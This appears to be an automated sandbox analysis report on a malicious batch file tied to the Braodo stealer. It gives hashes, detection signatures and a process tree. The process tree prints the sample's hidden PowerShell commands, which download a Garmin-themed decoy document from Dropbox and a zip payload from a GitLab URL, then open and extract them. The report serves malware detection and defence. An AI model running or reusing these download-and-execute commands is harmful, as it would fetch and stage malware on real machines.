Edit tour
Windows
Analysis Report
hngarm13de02.bat
Overview
General Information
| Sample name: | hngarm13de02.bat |
| Analysis ID: | 1576962 |
| MD5: | 30d859593164bb2e5772ec1f0363b128 |
| SHA1: | c618d811df76a1012a7e6c3111f12518b89ba377 |
| SHA256: | 72613d206cd2f91fae84304ffed26ff79abdadabaeca47d62e2e09697e5f16d9 |
| Tags: | batBraodofgsd1user-JAMESWT_MHT |
| Infos: |   |
 | |
Detection
Abobus Obfuscator, Braodo
| Score: | 92 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Yara detected Abobus Obfuscator
Yara detected Braodo
Yara detected Powershell download and execute
AI detected suspicious sample
Powershell drops PE file
Sigma detected: PowerShell DownloadFile
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
cmd.exe (PID: 6568 cmdline: C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\hngar m13de02.ba t" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6544 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
chcp.com (PID: 1608 cmdline: chcp.com 4 37 MD5: 33395C4732A49065EA72590B14B64F32) - find.exe (PID: 3444 cmdline:
find MD5: 4BF76A28D31FC73AA9FC970B22D056AF) - findstr.exe (PID: 3192 cmdline:
findstr /L /I set "C :\Users\us er\Desktop \hngarm13d e02.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - findstr.exe (PID: 2056 cmdline:
findstr /L /I goto " C:\Users\u ser\Deskto p\hngarm13 de02.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - findstr.exe (PID: 3168 cmdline:
findstr /L /I echo " C:\Users\u ser\Deskto p\hngarm13 de02.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - findstr.exe (PID: 2844 cmdline:
findstr /L /I pause "C:\Users\ user\Deskt op\hngarm1 3de02.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - find.exe (PID: 1696 cmdline:
fInd MD5: 4BF76A28D31FC73AA9FC970B22D056AF) - cmd.exe (PID: 4416 cmdline:
C:\Windows \system32\ cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 5216 cmdline:
C:\Windows \system32\ cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) 
powershell.exe (PID: 6024 cmdline: powershell .exe -Wind owStyle Hi dden -Comm and "[Net. ServicePoi ntManager] ::Security Protocol = [Net.Secu rityProtoc olType]::T ls12; (New -Object -T ypeName Sy stem.Net.W ebClient). DownloadFi le('https: //www.drop box.com/sc l/fi/2vtgu j371ghesde eygeie/Gar min_Campai gn_Informa tion_for_P artners_V6 .docx?rlke y=5epffuh4 p11572mmaj 6rgumtn&st =a77woigz& dl=1', 'C: \Users\use r\AppData\ Local\Temp \\Garmin_C ampaign_In formation_ for_Partne rs_V6.docx ')" MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 5408 cmdline:
powershell -WindowSt yle Hidden -Command "Start-Pro cess 'C:\U sers\user\ AppData\Lo cal\Temp\\ Garmin_Cam paign_Info rmation_fo r_Partners _V6.docx'" MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 5064 cmdline:
powershell .exe -Wind owStyle Hi dden -Comm and "[Net. ServicePoi ntManager] ::Security Protocol = [Net.Secu rityProtoc olType]::T ls12; (New -Object -T ypeName Sy stem.Net.W ebClient). DownloadFi le('https: //gitlab.c om/fgsd1/g g/-/raw/ma in/FGa1312 .zip', 'C: \Users\Pub lic\Docume nt.zip')" MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 2800 cmdline:
powershell .exe -Wind owStyle Hi dden -Comm and "Add-T ype -Assem blyName Sy stem.IO.Co mpression. FileSystem ; [System. IO.Compres sion.ZipFi le]::Extra ctToDirect ory('C:/Us ers/Public /Document. zip', 'C:/ Users/Publ ic/Documen t')" MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_AbobusObfuscator | Yara detected Abobus Obfuscator | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| JoeSecurity_Braodo_1 | Yara detected Braodo | Joe Security | ||
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| JoeSecurity_Braodo_1 | Yara detected Braodo | Joe Security | ||
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: | ||
| Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): | ||
⊘No Suricata rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection | |
|---|
| Source: | Integrated Neural Analysis Model: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | IP Address: | ||
| Source: | IP Address: | ||
| Source: | JA3 fingerprint: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | String found in binary or memory: | ||